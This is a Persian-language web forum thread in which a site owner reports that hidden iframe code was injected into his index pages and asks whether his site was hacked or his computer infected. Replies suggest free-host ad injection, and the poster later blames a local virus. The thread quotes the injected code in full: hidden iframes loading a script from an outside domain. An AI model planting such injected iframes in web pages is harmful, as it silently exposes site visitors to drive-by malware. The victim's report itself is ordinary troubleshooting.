ورود

View Full Version : این ویروسه جدیده یا سایت طرف هک شده؟



raspotineiran
سه شنبه 13 فروردین 1387, 11:05 صبح
سلام دوستان
دیروز دوستی بمن زنگ زد گفت تو صفحه اول سایتش همه چیز پاک شده ؛ چک کردم دیدم تو شاخه www که قبلا index.html گذاشته بودم هست ولی یه فایل دیگه هم بود که نمیدونم از کجا تو این سایت اومده index.htm که تو این htm دومی فقط یه خط بود:

<iframe avgjc='jUZIKgnO' src='http://olthart.com/imag/in.cgi?2 ' ndcll='2PeZ6gp1' width='616' height='96' style='display:none'></iframe><iframe vqiff='rORIfY68' lngse='QrauX48Q' oxmgk='6uAr6aew' pwplo='TNfzeZaA' uomgs='z5te6zrV' src='http://olthart.com/imag/in.cgi?2 ' okpbv='ul388nTf' lywwp='Ogi61Tnf' dcwvn='te1fGFDh' qhbll='hgVwaP2I' fvtts='rWlZqV0f' width='97' height='516' style='display:none'></iframe>

بعد فایل index.html اصلی که من تو سایت گذاشته بودم رو چک کردم با کمال تعجب دیدم که یه خط اضافی اول ان بود اینطور نوشته شده:

<iframe avgjc='jUZIKgnO' src='http://olthart.com/imag/in.cgi?2 ' ndcll='2PeZ6gp1' width='616' height='96' style='display:none'></iframe>
<html>
<head>

در صورتیکه من خط بالای <html> رو من ننوشته بودم
حال موندم چه اتفاقی افتاده ایا سایت مربوطه هک شده و بایستی username +password مربوط به ftp را change کنم یا یه ویروس تو سیستم من بوده که من تو سایت اپلود کردم
بهر حال دیروز فایل index.html را درست کردم و خط اول اضافی را پاک کردم ولی باز امروز همان اش و همان کاسه!
دوباره رفته یه خط به فایل index.html اضافه کرده؛ کسی تجربه این اتفاق رو داره راهنمایی کنه؟

درضمن یادم رفت بگم که یه فایل قدیمی هم از قبل تو شاخه www گذاشته بودم بنام index2.html دیدم به اونم یه خط اضافه شده بود مثل اینه هرچی فایل اول اسمش index باشه میره یه خط اضافه میکنه!

moslem-visual
سه شنبه 13 فروردین 1387, 21:13 عصر
شما از هاست رایگان استفاده میکنید؟ بعضی اوقات مسئولین این نوع هاست برای ایجاد تبلیغات چنین اسکریپتهایی رو به طور خودکار به فایلهای شما اضافه میکنند.

raspotineiran
چهارشنبه 14 فروردین 1387, 08:19 صبح
نه دوست عزیز از هاست رایگان استفاده نکردم ولی فعلا ویندوز خودم را عوض کردم و هرچی فایل مشکوک از قبیل index.htm تو سایت بود پاک کردم -فعلا گوش شیطون کر مثل اینکه خبری نیست- به نظر میاد سیستم من ویروسی شده بوده و روزهای قبل که فایل اپلود میکردم (با فایرفاکس) این ویروس هم اقدام به این کارها میکرده - این ویروس که نمیدونم اسمش چیه یه فایل هم بنام KWU1K0 گذاشته بود تو روت درایو c .